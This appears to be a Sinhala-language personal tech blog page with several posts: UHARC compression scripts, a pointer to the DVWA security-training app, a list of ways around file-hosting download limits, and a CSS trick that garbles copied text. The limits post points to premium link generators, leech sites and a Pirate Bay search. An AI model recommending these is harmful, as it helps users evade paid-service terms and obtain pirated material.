Showing posts with label පරිඝනක hacking. Show all posts
Showing posts with label පරිඝනක hacking. Show all posts

ආවා ආවා .... - නැවත කරලියට පැමිනිම .

15

Share/Bookmark


හම්මෙ මම හිතන්නේ මාසයකට පස්සේ තමා මේ පැත්තට ආවේ ... , මේකේ බැඳිලා තිබුන මකුළු දැල්වල තරම . මුලින්ම කියන්න ඕනේ . මේ මාසේ තමා මාර මාසේ .  මගේ හාර්ඩ් එක යාලුවෙකුගෙයි , මගෙයි සුළු පරිමාණයේ වැඩකට සර්වර් එකක් රන් කරගන්න ගන්න උන නිසා ඒක සර්වර් එකට දෙන්න උනා . ගිය මාසේ (අගෝස්තු) 29 වෙනකම්ම වැඩකලේ ubuntu bootable CD එකකින්  ගේම දිගෙන තමා. මැසිමේ වැඩකලා කියුවට මෙලෝ දානයක් කලේ නෑ , කරන්නේ කොහෙද මැසිමේ හාර්ඩ් එකක් නැතුව . කරපු එකම දේ තමා හැමදාම මැසිම දාගත්තොත් , මුලින්ම Ubuntu CD එක දානවා , flash player එක භාගත කරගෙන , buffer කර කර ෆිල්ම් බලන එකතමා කලේ . ඔය අතරතුර තමා Naruto දැක්කේ ... ; කොල්ලා මුලින්ම මේකේ ෆිල්ම් කැලි දෙකක් බැලුව ගමන් මේක දිගටම බලන්න ඔලුව මෝල් වෙලා ගියා . Naruto movies ඔක්කොම ටික බලලා , දැන් දාගෙන episodes දාගෙන බලනවා . පිස්සු හැදෙන කතාව මෙයා ... පිස්සු හැදිලා ආයෙත් හැදෙනවා . කොච්චර පිස්සු කියනවා නම් මුලු දවසම ඒක තමා . සති 2 කකට e-mail එක පැත්ත පලාතේ ගියේවත් නෑ ,  මුනුපොතෙත් පැත්ත පලාතක ආවේ නෑ .. මේක නිසා අම්මාගෙන් මැරෙන්න බැනුම් ඇහුවා , මෙහෙම බලලා ඇස් පොට්ට කරගන්නවා කියලා . ඊළඟට ලව් පලහිලව්වක් විසඳන්න ගිහිල්ලා කෙල්ලගෙන් ගුටි කනවා තවා පොඩ්ඩෙන් . ඔහොම තමා මේ සති ටික ගියේ නම් .ඔය අඵත විඩියෝ එක බලන්නකෝ මම කොහොමද Naruto බැලුවේ කියලා . මුලින්ම anime site එකක naruto episodes වලට ලින්ක්ස් දිලා තිබ්බා , ඒවා බැලුවා .. බෆර් වෙන්න හැට පැයක් යන නිසා , ඒකේ බැලිල්ල එපා වුනා . ඊලගට youtube එකෙන් හොය හොයා බැලුවා. ඒකේ episode 60 විතර වෙනකොට විඩියෝ හොයාගන්නත් නෑ (මම කියන්නේ naruto shippuden episodes නෙවෙයි හොඳේ ...) . ඊලඟට මට හම්බවුනා facebook එකෙන් විඩියෝ ලොඩ් වෙන ලින්ක් ටිකක් ... කතා කිහිපයක් යනකොට ඒකේ ලින්ක්ස් නැතුව ගියා . අනික ඒ වෙබ් අඩවියේ  කතා වලට දාලතියන player එකේfullscreen , volume control මුකුත් නෑ . ඉතින් firefox වලට එන firebug plugin එකෙන් page source එක වෙනස් කරලා ඒක ලෝඩ් කරගන fullscreen (browser එකේ) දාලා බැලුවා .ඒකත් එපා වුන නිසා ඊලගට මම අදාල විඩියෝ එකේ source URL එක අරගෙන ඒක online තියන JW player wizard එක හරහා ලෝඩ් කරලා බලන්න හැදුවා , නො ලක් , භාගයක් විතර බෆර් වෙලා නවතිනවා . 10 පාරක් විතර ගේම දිලා හරිගියේ නැති නිසා ආයේ පරන megavideo buffer කිරිල්ලටම ගියා . බලන්නකෝ දුක .... (* කියන්න අමතක වුනා 4shared , yoku.com වගේ සයිට් වලිනුත් ලින්ක් අහුවුනාට , ගොඩක් වෙලාවට ඒවා වල file size එක 150 -250 MB වුනා . යකෝ පැයභාගයක් ඇතුලත මගේ උපරිම දාලා සාමානයෙන් දාගන්න පුලුවන් 100 MB යි (512 kbps නේ) , episode එකක් සාමානයෙන් යන්නේ විනාඩි 22-23 වගේ තමා .)

පහල විඩියෝ එකත් බලන්නකෝ කොහොමද මම naruto බැලුවේ කියලා ...





හරි දැන් ඉඳලා ඉඳලා දාන පොස්ට් එක නිකම් වල්පල් දාලා වැඩක් නැනේ , මොකක් හරි දෙන්න ඕනේනේ වටින යමක් ... එහෙම කියලා නේ දිගපොස්ට් ලියන්න බැ , මට Naruto බලන්න දැන් ඔලුව ගහලා තියන්නේ .. ඒක නිසා ඒක අනිවාර්යෙන්ම බලන්න ඕනේ .. ඊළඟට මේ මගේ ඔලුව programming වල ඉඳලා web design පොඩ්ඩක් අතපත ගාන්න කැසිල්ලක් ආවනේ . මේ දවස්වල දාගෙන jquery එක්ක මාර මාර experiments කරන්නේ ..    හිතාගෙන ඉන්නේ ලඟදීම මගේ මුල්ම CSS+ jquey + HTML කරපු ඩිසයින් එක ජනතාවට ලබාදෙන්න .  web layout එක කෝඩ් කලේ  පට්ට මුලඉඳලා , හැබැයි හිතුව තරම් අමාරු වුනේ නෑ... දඩබඩ ගාලා අල්ලගන්න පුලුවන් ....web layout නම් ගොඩක් කලා තියනවා. නමුත් public එකට මුලු ටෙම්පෙලේට් එකම නොමිලේ ලබාදෙන්නේ මුල් වතාවට තමා . මම නම්  programming නිසා මට ඔය design එච්චර අල්ලන්නේ නෑනේ . නමුත් එහෙම කියලා හැමදාම අතහැරලා දාලා ඉන්න බෑනේ , ඉතින් ආසාවක් ආවා designing පැත්තට ඔලුව දාලා බලන්න . බොරු කියන්න ඕනේ නෑ , photoshop වලට මම නම් තාම අලුත් .. ඒ වගේම මේ දවසවල ඔලුව බරටම දාලා තියන්නේ flash action script ඉගෙනගන්න . තව හිතාගෙන ඉන්නවා ඉස්සරහට මේ වෙබ් ඩිසයිනින් වැඩිදියිණු කරගන්න කියලා පට්ට template හදලා කට්ටියටම නොමිලේ දෙන්න . ඔක්කොම සෙල්ෆ් ස්ටඩියි තමා ඉතින් යන්නේ . ඉතින් වැරදි තිබ්බොත් පෙන්නලා දෙන්න හොඳේ .... හැබැයි මේකත් කරන්න වෙන්නේ වෙලාව තියන විදිහ අනුව තමා ....

හරි දැන් වල්පල් ඇති . වැදගත් ලිපියක්ක් ලියන්න ඕනේ නිසා මම අද තාක්ශනික කරුනු කිහිපයක්ම සහ අනම් මනම් විකාර ටිකක් , එකම් ලිපියක ලියල දාන්නම්කෝ ...

1. UHARC- Ultra Compression Software



මේක ඉක්මනට කොටාගන්න ඔනේ නිසා තමා මේවා ලියන්නේ , හොඳ තාක්ශනික ලිපියක් මම Naruto episodes ඔක්කොම බලලා ඉවරවෙලා ලියන්නම්කෝ..

ආ හරි ට්‍රෑක් එකෙන් අද මම පිට පනිනවා වැඩිනේ අද ... හරි විකාර ඇති .. දැන් මාතෘකාවට ..කට්ටටිය මේක ගැන දන්නවාත් .. ඇති , නොදන්වත් ඇති. යාලුවෝ ගොඩක් කට්ටිය අහපු නිසා තමා , මමත් මේක කොටන්නේ ... Uharc ගැන කියනවා නම් , ඔය ගේම් ගහන පප්පලා මේක ගැන අනිවාර්යෙන්ම දන්නවා ඇති. මොකද ඔය ගොඩක් වෙලාවට අර ගේම් setup එනකොට එන්නේ CD වලට Highly Compress කරලානේ . ඉතින් දැන් ඔය සෙටුප් extract කරනකොට අර setup එක ගිහිල්ලා , අර windows command prompt එකේ වගේ කළු පාට screen න් එකක තවත් setup එකක් යන්නේ .. ආන්න ඒක තමා ඔය Uharc  එක (*බොහෝ වෙලාවට) .

මේකේ compression ratio එක සාමානයෙන් අනික් file compression softwares වලට වඩ කිහිප ගුණයකින්ම වැඩියි . ඒ කියන්නේ file එකක් මේකෙන් compress කරල ගත්තොත් , අනිතිමට file එකේ size එක , file එකේ මුල් siz e එකෙන් 19% වගේ ගානකට ගන්න පුලුවන් . හිතාගත්ත හැකිනේ ටොයියාගේ තරම .
 ආ මුලින්ම කියන්න ඔනේ , මේක මුලින්ම ලියුව (අර original author ) මේක කෝඩ් කරලා තියන්නේ command line ලියන්න නිස ,මේකට GUI එකක් නම් නෑ . පහත් විඩියෝ එක බලන්නකෝ කොහොමද Command line එකෙන් මේක කරගන්නේ කියලා . command line  එකෙන් කරන කොට folders compress කරන්න බෑ, files  විතරයි . පස්සේ මේකට එක එක කට්ටිය GUI 's  දාලා මෘදුකාංග හදලා තියෙනවා , දැන් ඔයාලට බය නැතුව ඔය GUI තියන එකක් අරගෙන වැඩේ කරගන්න පුලුවන් .




Script :

* for extracting: @echo off ren uha.dll uha.exe uha.exe x -y name.arc ren uha.exe  uha.dll 
*  for creating archive: @echo off ren uha.dll uha.exe uha.exe a -m3 -r -pf -o name.arc (Path: C:\uharc.exe) 

Download : ftp://ftp.elf.stuba.sk/pub/pc/pack/uharc06b.zip
                http://www.megaupload.com/?d=68ZMXEYL 


UHarc -GUI SOftwares : 

http://www.klaimsoft.com/winuha/
http://mulder.dummwiedeutsch.de/home/?page=projects#uharcgui
http://filecompress.altervista.org/
http://www.softpedia.com/get/Compression-tools/UHARC-GUI-by-Brhack.shtml
http://www.softpedia.com/get/Compression-tools/UHARC-GUI.shtml

මෙම මෘදුකාංගය (*හෝ වෙනත් compressing මෘදුකාංගයක් වේවා ..) භාවිතා කිරිමේදි භාවිතා සැලකිය යුතු මුලික කරුණ වන්නේ  compress  වෙලා තියන files compress කලාට වැඩි ඉඩක් අඩුවෙන්නේ නෑ . ඒ කියන්නේ { Divx , avi,mkv, mp3 ......- Audio/ Video compressed files } , { ISO,MDF........ - Compressed Images Files}, { Rar,Zip....... - File Compression Softwares Files} මෙම මෘදුකාංගය හරහා compress කලාට මෙයින් ලබාගැනිමට බලාපොරොත්තු වන compression ration එක ලබාගත නොහැක , මන්දයත් ඉහත සඳහන් කල file formats / extenstions වලින් සමන්විත files , යම්කිසි compression method එකක් මඟින් compress වි තිබන නිසාය .

*තව compression software ලබාගැනිමට පහත ලිපිනය භාවිතා කරන්න .
  http://www.maximumcompression.com/programs.php

* තවද KGB Archiver (http://kgbarchiver.net/) ද , මෙලෙස ඉතා ඉහල compression එකක් ලබාදෙන මෘදුකාංගයක් වන අතර , මෙයින් ඉතා ඉහල compression එකක් ලබාගැනිමට ඉතා ඉහල ධාරිතාවයකින් යුත් පරිඝනයක් අවශයවේ . මේක කොච්චර වැඩකාරයෙක්ද කියනවා නම් ... මට 700 MB තිබෙන GTA-SanAndreas file එකක් 2MB වලට compress කරලා හම්බවුනා , හැබැයි ඒක extract කරන්න ගියහම පැය 6 ක් ගියා , මැසිමේ වෙන වැඩක් කොරන්නේ නැතුව (*වෙන වැඩක් කරන්න බෑ.. ; මැසිම : 1.5 GB Ram - FSB:555 MHz, 2.8 Ghz Dual Core Processor))

2.Damn Vulnerable Web App 




DAMN (Damn Vulnerable Web App) කියන්නේ ඔයා hacking පප්පලාට , web developers ලට , ඉගෙනගන්න මම වගේ හිච්චොන්ට ,  PHP / MYSQL web based application වල ආරක්ශාව කෙසේද තිබෙන්නේ , වැඩකරන්නේ යන්න ටෙස්ට් කිරිම සඳහා සාදා ඇති පුංචි script එකක් . මේ security අතින් තියන්නේ අනිතිම පහල . ඉතින් අපිට ඔය එක එක attacks ටෙස්ට් කරන්න කියාපු scipt එක .ඔයාලත් දාගෙනම බලන්නකෝ ..



http://www.dvwa.co.uk

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

මේ වගේ script ගොඩක් තියනවා... මේ වගේ script කොලෙක්ශන් එකක් ගැන වෙනම ලිපියකින් ලියන්නම්කෝ .. දැනට මතක් වුන නිසා ඒකත් කොටලා දැම්මා .

3.TuiTalker - Free Phone Calls



 නිකම් ජංජාලයේ සැරිසරන ගමන් හම්බවුනා , එල සේවාවක් (free internet calls) වැඩි රටවල් ගානකට ලබාදෙන service එකක් ගැන .. මේක අනික් service එක්ක බලනකොට වටිනවා . දවසකට විනාඩි 6-18 අතර කාල සිමාව ඇතුලත රටවල් 40 (http://tuitalk.com/provisioning/end-user/zhtml/countries.zhtml) කට ආසන්න ගණනකට මෙම සේවාව ලබාදෙනවා . ලංකාවට නම් නෑ , නමුත් බොහෝ පිටරට ඉන්න අයට call කරන්න හොඳයි . ශොට් එකක් දිලාම බලන්නකෝ, නිකම් දෙන එකනේ ....

ඔන්න ලින්ක් එක : http://tuitalk.com

4. විකාර විඩියෝ ....

* ඔබේ පොඩි එකා Hacker කෙනෙක්ද කියලා හොයාගන්නේ කොහොමද ??



*මත තියාගන්න "Lunix" කියලා Operating System එකක් තියන වග : http://en.wikipedia.org/wiki/LUnix

*ගේම් හොරුන්ට සලකන්නේ මෙහෙමයි ....

ඉතිරිය කියවන්න .....>>

 

ගේම දිම - ගින්නක් නැතුව Rapidshare /Hotfile / Megaupload (File Hosting ) සහ torrents බෑමට පිළියම්.

17

Share/Bookmark
ඉක්මනට පොස්ට් එකක් ලියලා යන්න හිතුණා .. ඉතින් මේ හැමෝම මගෙන් (*මෙගෙන්ම විතරක් නෙවෙයි , මේවා දන්න කියන හැමෝගෙන්ම)100 සැරයක් විතර අහන එකම එක ,මට කියලා කියලා එපා වෙලා නිසා නොදන්න අය දැනගත්වා කියලා , මේක ඉක්මනට කොටල දාන්නම් .busuk

හරි වල පල් නැතුව  මම දඩබඩ ගාලා මේක කියලා දාන්නම්කෝ . ඔය HSPA හාවිතා කරන අයට එන ලොකුම ගැටලුව තමා , මේ හැමෝටම එකම IP Address එක එන නිසා Rapidshare , Megaupload , HotFiles වගේ file hosting වෙබ් අඩවි වලින් ගොනු භාගත කරගන්න කොට තියන අවුල් nangih . ඉතින් ඔය අනං මනං විකාර ටික නවත්ගන්න නම් ක්‍රම කිහිපයක්ම තියෙනවා . මට  මතක් වුන ක්‍රම කිහිපයකින් විඩියෝ කට්ටක් කළා , ඒක මම මෙතැම දාන්නම් , පස්සේ මේක හිමිට යාවත්කාලිනය කරන්නම් තව ක්‍රම මතක් වෙන විදිහට ....nerd.


අනේ විඩියෝව බලා තේරුම්ගෙන , facebook යෙහි මට තවත් කරදර නොකරත්වා !!!

මතක් වෙලා කරපු ක්‍රම ටික තමා ,

1. IP Changing
2.Proxy / VPN
3. Rapid Leechers / web based Torrents Clients ...
4. Premium Link Generators
5. Other ...




Modem තියාගෙන  IP  Address වෙනස් කරගන්න ඕනේ අය පහත විඩියෝ කට්ට බලන්නකෝ !! garupale



අදට ඔච්චරයි , හෙට උදෙන්ම class යන්නත් තියනවා , ඔයාලටත් මොනාහරි මතක් වුනොත් ඔය පහලින් ලියලම යන්නකෝ !!sengihnampakgigi

අවශය විස්තර සහ ලින්ක්ස් :

1. IP Changing

http://whatismyipaddress.com/change-ip

මේක හැම එකාම දන්න නිසා ,  මම මේක අමුතුවෙන් කරන්න යන්නේ නැ , නමුත් අනිත් නොදන්න අයට
දැනගැනිම පිනිස,  මම Router එකක් තිබේ නම් IP එක වෙනස් කරගන්නේ කොහොමද කියලා පෙන්වන්නම් . 
Modem  එකක් භාවිතා කරන අයට කොහොමද කරන්නේ කියලා පෙන්වන  විඩියෝ එකක් , මගේ බ්ලොග්
එකේ දාලා ඇති , ඒක ගිහිල්ලා බලන්න .

2.Proxy / VPN


Lists : http://www.proxy4free.com/page1.html ...
          http://www.allproxysites.com/

http://www.hidemyass.com/proxy-list/

Program : Ultra Surf : http://www.ultrareach.com/

===========
 173.201.183.172 : 8080

3. Rapid Leechers / Torrents ...

http://www.rapidleech.com/ (Script)

Sites  list : http://rlindex.net/

eg : http://www.rapid115.com/1/ (site)

==============================
 browser-based and remotely hosted BitTorrent clients

Torrents : http://btaccel.com/
                 http://www.bitlet.org/

Search: http://thepiratebay.org/search/hacking%20pdf/0/99/0
                

4. Premium Link Generators

http://rapidshare-premium-link-generator.com/
http://www.rapid8.com

(* For other file hosting services & more rapidhare , just do a google , you'll find plenty more sites ..... :D)

5. Other ...

* Rapid Share Time Defeat
javascript:alert(c=0) : not working now ... :(

Update :

කට්ටියට වැඩිපුර දැනගන්නත් එක්ක ..... ; අපි දැන් දන්නවානේ කොහොමද ගේමක් නැතුව ගොනු බාන්නේ කියලා , නමුත් ගොඩක් අය දන්නේ නෑ , අපිට ඔය ගොනු upload කරනකොට එකපාරම file hosting වෙබ් අඩවි කිහිපයකට එකමසැරේ ගොනු යවාගන්න පුලුවන් කියලා . මේක ගැන පොඩි සටහනක් දාන්න හිතුනේ මේ ලිපිය දැකලා , මගේ යාලුවෙක් මේ upload ගැන ඇහුව නිසා. අඩේ මට මේක ගැන ලිය ලිය ඉන්න කම්මැලි , නෙට් එකේ තිබ්බ ලිපියක ෆොටොකොපි එකක් මෙතැන දාන්නම්කෝ. ආ කියන්න අමත වුනානේ මේ අඩවි වල තියන අනෙක් විශේෂත්වය තමා , අපිට මෙයාලෙගේ server වලට හරි , file hosting service වලට හරි remote upload එකත් දාන්න පුලුවන් , ඒ කියන්නේ වෙන වෙබ් අඩවියක තියන ගොනුවක් , අපේ පරිගනකයට භාගෙන ,ආයෙත් එය upload නොකර ,කෙලින්ම අර වෙනත් වෙබ් අඩවියේ තියන ගොනුවේ URL එක දිලා ඒක කෙලින්ම වෙන file hosting service එකකට දාගන්නත් පුලුවන් . ලිපිය ඉස්සුවේhttp://www.technotraits.com/2009/04/7-websites-that-upload-files-to-multiple-file-sharing-sites-at-once/ . නෙට් එකේ ගුගල් කලොත් තව නාන්න හොයාගන්න පුලුවන් . මම ඔක්කොම services බැලුවේ නෑ ..... හිමිට බලලා update කරන්නම් . කියන්න ඔනේ වුනේ මෙහෙම එකක් තියනවා කියලා විතරයි.


1. Gazup


          
Gazup supports 9 services including Rapidshare, Megaupload, Badongo. Maximum file size is limited by the services you choose. It can fetch files from remote location or via FTP including normal upload. It shows a upload progress bar that let you see how much of your file has uploaded.

2. RapidSpread


RapidSpread also does not impose any file size restrictions and supports upto 10 services including Rapidshare, Megaupload, Easyshare. It can fetch files from remote locations too. The interface of Rapidspread is not that good as of Gazup. I liked the way it showed download links for uploaded file.

3. FileDucky


FileDucky supports 4 services Rapidshare, Badango, Sendspace and Zshare. Also, it imposes a limit of 100MB per file. The upload progress bar didn’t work out for me. Also, the uploaded file page is a bit confusing.

4. MassMirror



With Massmirror You can upload files upto 1 GB in size though you might be restricted by the file size limit imposed by file sharing service like Rapidshare. It can fetch files from web easily. Though you might get annoyed by the advert that loads before you see the site. The file download links page is clean and clear and also lists estimated download time for different connection speeds. MassMirror supports 4 services Rapidshare, Badango, MegaUpload and Zshare.

5. UploadJockey



UploadJockey though imposes a 100 MB file size limit but with UploadJockey you can earn money as well. For every 1000 hits of your file download page, you can get $2. The file download page is a bit confusing. It supports 9 services if you sign up with them including Rapidshare, Megaupload etc.

6. Sharebee



Sharebee supports RapidShare, DepositFiles, MegaUpload, ZShare and Badango. It imposes a 150 MB file size limit. But interface wise, this one is the best out of all and pretty easy to use.

7. Qooy



Qooy supports 12 file sharing services without any file size restriction on its part. But you can distribute a single file to only 6 services at once. It can fetch files from remote locations too.

8. Upload Mirrors



Upload Mirrors looks like a refined version of Qooy as it can upload single file to 12 services at once. It does not support remote file fetching though. The interface of both Qooy and Upload Mirrors is very similar.
ඉතිරිය කියවන්න .....>>

 

රැවටිල්ල - CSS සමඟ Copy-And-Paste නැවතිම

11

Share/Bookmark
දවස් 6 කින් විතර මුකුත් ලියන්න බැරිවුනා ,මේකත් නිකම් පාලුවට ගිහිල්ලා වගේ . අනේ දුකෙත් බෑ nangih! ; හරි හරි අද කියන්න යන්නේ තමගේ කියලා වටින දෙයක් වෙබ් අඩ්වියක තියවානම් ඒක බේරගන්න පුලුවන් , පට්ට සරල ක්‍රමයක් ගැන . මේක ඉතින් ඔන්න අර පරණ තාලේ javascript එකක් නම් නෙවෙයි sengihnampakgigi, හපෝ ඔයාලා දන්නනවානේ ,  browser එකෙන් javascript disable කරපු ගමන් ඉතින් script ඔක්කොටම බඩු පැකට්නේ . අද මම කියන්න යන්නේ CSS යොදාගෙන කොහොමද තමන්ගේ දේවල් හොරුන්ගෙන් බේරගන්නේ කියලා .මේකත් මම අද ගෙදර නිසා azarask.in බ්ලොග් එක කියවන කොට හම්බවුණා . ලියලා ඉවර කරන්න ඕනේ හැකින් පොස්ට් ටිකත් draft කරලා තියන ගමනම තමා මේකත් ලියන්න හිතුණේ . garupale


හරි අපි වැල් වටාරන් නැතුව වැඩේට බහිමුකෝ . දැන් හිතන්න අපේ වැදගත් කියලා හිතන විස්තර ටිකක් වෙබ් අඩවියක තියනවා කියලා . හිතන්න මේ තියන විස්තර අපිට ඔය web bot ලගෙනුයි , web scrapping කරන අයගෙනුයි බේරගෙන , සාමාන‍ය මිනිසුන්ට තියන දේ තේරුම්ගන්න පුලුවන් විදිහට පෙන්නන්න ඕනේ කියලා, අන්න ඒක තමා අපි මෙතැනදි CSS භාවිතාකරගෙන කරන්න බලාපොරොත්තු වෙන්නේ hah . මෙහි අපි මුලිකවම කරන්නේ HTML එකේ source එක CSS යොදාගෙන mix කරනවා bot කෙනෙකුට අඳුනගන්න අමාරුවෙන්න , නමුත් මෙහි visual rending ( browser එකෙන් අපිට පෙනෙන සාමානය විදිහ ) එක කියවිය හැකි ලෙස තියෙනවා . පහත විඩියෝ කට්ට බලන්නකෝ.






හරි දැන් ඔයාලා විඩියෝ එක බැලුවානේ දැන් බලමුකෝ ඒවගේ CSS යොදාගෙන හදාගන්නේ කියලා .
හරි මුලින්ම බලමුකෝ විඩීයෝ විදිහට  ;
* කොහොමද තමන්ගේ e-mail එක බේරගන්නේ කියලා .

Demo :

  kodagod[REMOVETHIS]aashan@ya
[REMOVETHIS]hoo.com       

ඉහත මගේ e-mail ලිපිනය ඇත . දැන් එය කොපි කර වෙන තැනකට පිටපත් කරන්නකෝ . පේන්වානේ වුන වැඩේ garupale . e-mail එක අතරට "[REMOVETHIS]" කියලා ආවා . ඉස්සෙල්ලාම පහත කේතය බලන්නකෝ .

කේතය :

<div>
<style>
.z{
  float:right;
  font-size:.001px;
  color:transparent;
  display:inline-block;
  width:0px;
  }
  </style>
&nbsp; kodagod<span class="z">[REMOVETHIS]</span>aashan@ya<span class="z">
[REMOVETHIS]</span>ho<span class="y">o.c</span>om</div>

හරි කේතය ගැන බැලුවොත් ඔයාලට පේනවා ඇති මම CSS වල  . z වලින් class එකක් ලියලා තියනව බව . ඔකෙන් අපිට වැදගත් වෙන්නේ z class  එකේ colour  එක transparent (කරලා තියන එකයි . එතකොට මෙතැනදි වෙන්නේ අපි .z class එක call කරලා ලියන්න ඕනේ දේ ඒක ඇතුලේ ලියුවහම , අපි ඒ ලියපු වචන කිහිපය බලන අපිට නොපෙන්වා source එකේ පමනක් හැංගිලා තියනවා . සරලව කියුවොත් අපි ඔය z class තුල ලියලා තියන ඒවා ඔයාලට පෙන්නේ නෑ , නමුත් ඔයාලා e-mail එක කොපි කරන්න හැදුවොත් browser  එක දන්නේ නැ , ඔය e-mail එක තුල තියන අනික් වචන ටික .browser එක ඔය ඔක්කොම කොපි කරලා දෙනවා . hah

* කොහොමද බ්ලොග් හොරුන්ගෙන් තමන්ගේ post බේරගන්නේ කියලා .

අනික් එක තමා මේක යොදාගන්න පුලුවන් ඔය web scrapping වගේ වැඩ වලින්. web scrapping වල්දී මුලිකවම කරන්නේ වෙනත් වෙබ් අඩවි වල තිබෙන දත්ත bot කෙනෙක් ඇතිව හෝ නැතිව ස්වයංක්‍රියවම ලබගැනිමයි . දැන් ඔය අපේ බ්ලොග් අවකාශයෙත් ඉන්නේ එහෙම් පිටින්ම පොස්ට් අච්චු ගහන එවුන් garupale. අන්න ඒ වගේ එවුන්ගෙන් වුන්ත් තමන්ගේ පොස්ට් බේරගන්නත් මේ ක්‍රමය භාවිතා කරන්න පුළුවන් .

Demo :

  තොඩ්වව්ඩ්ෆ්ග්ස්ල්ක්රතුරුඩ්වව්ඩ්ෆ්ග්ස්ල්ක් සහ සන්නිවේදන Information and communication technologies (ICT) යඩ්වව්ඩ්ෆ්ග්ස්ල්ක්නු තොරඩ්වව්ඩ්ෆ්ග්ස්ල්ක්තුරු සැඩ්වව්ඩ්ෆ්ග්ස්ල්ක්කසුම් සහ සන්නිවේදනය සමිබන්ධ සියලු පැතිකඩ ආවරණය කෙරෙන යෙදුඩ්වව්ඩ්ෆ්ග්ස්ල්ක්මකි.මෙතුඩ්වව්ඩ්ෆ්ග්ස්ල්ක්ළින් මූඩ්වව්ඩ්ෆ්ග්ස්ල්ක්ලික වශඩ්වව්ඩ්ෆ්ග්ස්ල්ක්යෙන් ප්‍රාථමික-ඩිජිටල්(pre-digital) තාක්ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්ෂණයන් ,එනම් මුද්‍රිත තාක්ෂණයන් ද ඇතුඩ්වව්ඩ්ෆ්ග්ස්ල්ක්ලත්ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්ව විස්තර කෙරුනද, ප්‍රධාඩ්වව්ඩ්ෆ්ග්ස්ල්ක්ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්න වඩ්වව්ඩ්ෆ්ග්ස්ල්ක්ශයෙඩ්වව්ඩ්ෆ්ග්ස්ල්ක්න්ම විස්ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්තර කරඩ්වව්ඩ්ෆ්ග්ස්ල්ක්නු ලඩ්වව්ඩ්ෆ්ග්ස්ල්ක්බන්ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්නේ තොඩ්වව්ඩ්ෆ්ග්ස්ල්ක්රතුඩ්වව්ඩ්ෆ්ග්ස්ල්ක්රැ සන්ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්නිව්ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්දනයට යෙදාගන්නා ඩිජිටල් ෆ්ග්ස්ල්ක්තාක්ෆ්ග්ස්ල්ක්ෂණ විධි ෆ්ග්ස්ල්ක්ක්‍රම( සන්නිෙව්දන ටොෆ්ග්ස්ල්ක්කෝල,සම්ෙපේෂණය උපක්‍රම,සන්නිෙව්දන උපකරණ, මාධ්ය සන්නිෙව්දනය) සෆ්ග්ස්ල්ක්හ තොරෆ්ග්ස්ල්ක්තුරැ ගබෆ්ග්ස්ල්ක්ඩා කිරිෆ්ග්ස්ල්ක්ම සහ සැකෆ්ග්ස්ල්ක්සුම් (ගණනෆ්ග්ස්ල්ක්ය කිරීෆ්ග්ස්ල්ක්ම,දත්ෆ්ග්ස්ල්ක්ත ගබෆ්ග්ස්ල්ක්ඩා කිරිෆ්ග්ස්ල්ක්ම)උෆ්ග්ස්ල්ක්පක්‍රෆ්ග්ස්ල්ක්මයෆ්ග්ස්ල්ක්න්ෆ්ග්ස්ල්ක්ය.මෙෆ්ග්ස්ල්ක්ම යෙෆ්ග්ස්ල්ක්දුෆ්ග්ස්ල්ක්ම ජනප්‍රයතාෆ්ග්ස්ල්ක්වයක් අෆ්ග්ස්ල්ක්ත්පෆ්ග්ස්ල්ක්ත් කෆ්ග්ස්ල්ක්රගැනීමෆ්ග්ස්ල්ක්ට පාෆ්ග්ස්ල්ක්ර්ෂ්විෆ්ග්ස්ල්ක්ක හේෆ්ග්ස්ල්ක්තුවෆ්ග්ස්ල්ක්ක් වූෆ්ග්ස්ල්ක්යේ තොෆ්ග්ස්ල්ක්රතුෆ්ග්ස්ල්ක්රු තාෆ්ග්ස්ල්ක්ක්ෂෆ්ග්ස්ල්ක්ණය සහ ටෙෆ්ග්ස්ල්ක්ලිකොෆ්ග්ස්ල්ක්ම් තාෆ්ග්ස්ල්ක්ක්ෂෆ්ග්ස්ල්ක්ණය සන්ෆ්ග්ස්ල්ක්නිපාතෆ්ග්ස්ල්ක්ෆ්ග්ස්ල්ක්ෆ්ග්ස්ල්ක්යිෆ්ග්ස්ල්ක්.      

ඉහත ඡේදය පිටපත් කරගෙන වෙන තැනක paste කරලා බලන්නකෝ මොකද වෙන්නේ කියලා . නිකම් වචන අදුනගන්න බැරි විකාරයක් පේනවා නේද (වැඩිය ඕක remix කරන්න ගියේ නෑ , ලිපිය ඉක්මනට කොටාගන්නත් ඕනේ නේ .... garupale)??

 කේතය : 
<div>
<style>
.z{
  float:right;
  font-size:.001px;
  color:transparent;
  display:inline-block;
  width:0px;
  </style>
තො<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>රතුරු<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>  සහ සන්නිවේදන Information and communication technologies undefinedICT)  ය<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>නු තොර<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>තුරු සැ<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>කසුම් සහ සන්නිවේදනය සමිබන්ධ සියලු පැතිකඩ ආවරණය කෙරෙන යෙදු<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>මකි.මෙතු<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>ළින් මූ<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>ලික වශ<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>යෙන් ප්‍රාථමික-ඩිජිටල්undefinedpre-digital) තාක්<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>ෂණයන් ,එනම් මුද්‍රිත තාක්ෂණයන් ද ඇතු<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>ලත්<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>ව විස්තර කෙරුනද, ප්‍රධා<span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span><span class="z">ඩ්වව්ඩ්ෆ්ග්ස්ල්ක්</span>න 